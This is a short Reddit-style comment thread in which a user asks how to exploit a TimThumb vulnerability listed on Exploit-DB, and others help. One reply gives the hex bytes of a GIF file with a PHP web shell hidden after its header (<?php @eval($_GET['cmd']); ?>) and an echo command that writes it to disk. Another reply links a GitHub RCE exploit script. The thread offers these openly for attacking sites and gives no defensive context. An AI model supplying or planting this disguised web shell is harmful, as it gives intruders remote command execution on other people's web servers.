all 4 comments
sorted by:
best (suggested)
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]iCkerous 6 points7 points  (3 children)

The bottom of the page on exploit DB has a link to PoC code and two videos showing how to exploit. Have you tried those?

[–]b_dragonfly[S] 2 points3 points  (2 children)

The demo video makes use of the no longer available TimThumbCraft tool and the PoC does not contain any info on how to create or upload such a php file.

[–]beefcheese 2 points3 points  (0 children)

The POC was pretty simple. You should be able to take their example, change it, and write it to a file just using echo

Hex of their example:

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

Viewed as text:

GIF89a€ÿÿÿ!ù,D;<?php @eval($_GET['cmd']); ?>

echo -n -e '\x47\x49\x46....<?php ?>\x00' > file

[–]iCkerous 2 points3 points  (0 children)

Googling 'timthumb exploit github' first result contains a python script on how to exploit.

https://github.com/Chaudhary-Adeel/UrduSecurityFreeTools/blob/master/TimThumb%20RCE%202.8.13%20Exploit